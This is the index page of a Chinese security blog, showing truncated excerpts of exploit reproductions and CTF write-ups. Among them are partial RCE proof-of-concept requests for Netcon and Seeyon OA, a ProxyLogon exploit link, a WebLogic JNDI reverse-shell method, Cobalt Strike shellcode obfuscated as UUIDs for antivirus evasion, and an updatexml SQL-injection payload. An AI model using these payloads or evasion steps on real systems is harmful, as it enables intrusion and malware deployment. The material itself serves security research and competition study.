c1ay's blog

c1ay's blog

信息安全原创技术博客

2021HW总结-网康NS-NGFW rce复现分析
流传的POC12345678910111213141516171819POST /directdata/direct/router HTTP/1.1Host: xxxConnection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x...
Microsoft Exchange RCE
参考文章 https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265 https://github.com/sirpedrotavares/Proxylogon-exploit/blob/main/exploit.py CVE-2021-26855 SSRF+CVE-2021–2...
shellcode-uuid免杀
参考文章RIFT: Analysing a Lazarus Shellcode Execution Method 生成uuid使用cobaltstrike生成python shellcodeAttacks->Packages->Payload Generator语言选择python(什么语言都可以),这里选择了生成x64的shellcode 用python将shellcode转为uuid,因为uuid.UUID(bytes_le=u)当中u的长度需要为16字节,所以需要将shellcode进行分组,每组16字节,不足的用\x00补位 12345678import uuids...
weblogic cve-2021-2109 jndi注入 远程代码执行复现
影响版本Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0 利用方式一:无回显利用-反弹shell1、工具github地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases vps上执行: 1java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反...
Seeyon-OA getshell漏洞复现和payload构造
最早流传的payload来自狼组知识库(谷歌快照) 漏洞概述:前台getshell 影响版本:致远OA <A8+ 通杀 漏洞利用payload: 123456789101112131415161718POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1Host: 127.0.0.1Connection: closeCache-Control: max-age=0Upgrade-Inse...
2020全国电信和互联网行业网络安全竞赛线下个人赛wp
序12月份参加的线下赛,补一下,个人赛成绩不怎么好,在这记录一下 webweb3: 12345678910111213141516<?phperror_reporting(0);//flag is located in flag.phpif( isset($_GET['a']) ){ $a = $_GET['a']; if( strlen($a)>27 ){ die(strval(strlen($a)) . " Long."); } if( preg_match("/[A-Zb-z0-9_$.&;|^...
2020网鼎杯总决赛web题
game_exp漏洞一:phar反序列化 regiter.php当中第3行-第9行: 1234567class AnyClass{ var $output = 'echo "ok";'; function __destruct() { eval($this -> output); }} AnyClass类的__destruct存在反序列化,而第31行file_exists函数刚好可以触发phar反序列化 poc构造 123456789101112131415<?phpclass AnyClass&...
2020网鼎杯半决赛web题
序第一次参加网鼎杯线下,由于太忙,这篇文章晚了一些,这次网鼎的赛制不同于以往线下的AWD模式,而是以一种AWD Plus的模式。 AWD Plus规则简述每个队伍会有相同的靶机和题目源码,得分分值分为攻击分值和防御分值两部分,攻击分值就是选手需要先找到靶机存在的漏洞,然后通过构造可以利用成功的exp获取靶机的flag提交获取的分值,防御分值是选手需要提交相应的修复代码给平台,平台每隔一段时间会自动对赛场选手的靶机进行攻击,被平台攻击成功的队伍获取flag的队伍会失去防御分值,反之,防御成功就会获得相应的防御分值,还有一点需要注意的就是选手提交的修复代码不能导致靶机环境服务异常,否则会有异...
2020全国电信和互联网行业网络安全竞赛wp
序补一下,11月份的比赛,太忙一直没时间更新 easy_sql很明显的注入,但是过滤了一些关键字,比如information、sys等,导致获取不到表名 通过: uname=1') and updatexml(1,concat(0x3a,(select * from flag)),1);-- -&passwd=1 可以发现存在名为flag表,并且可以获取到里面的数据 但是updatexml这种报错注入方式显示的信息有长度限制,而且这里不知道flag表当中flag的列名,关于无列名注入的问题,直接用子查询就能绕过 获取完整的flag: uname=1') an...
avatar
c1ay
Learning to be good at thinking, thinking, thinking.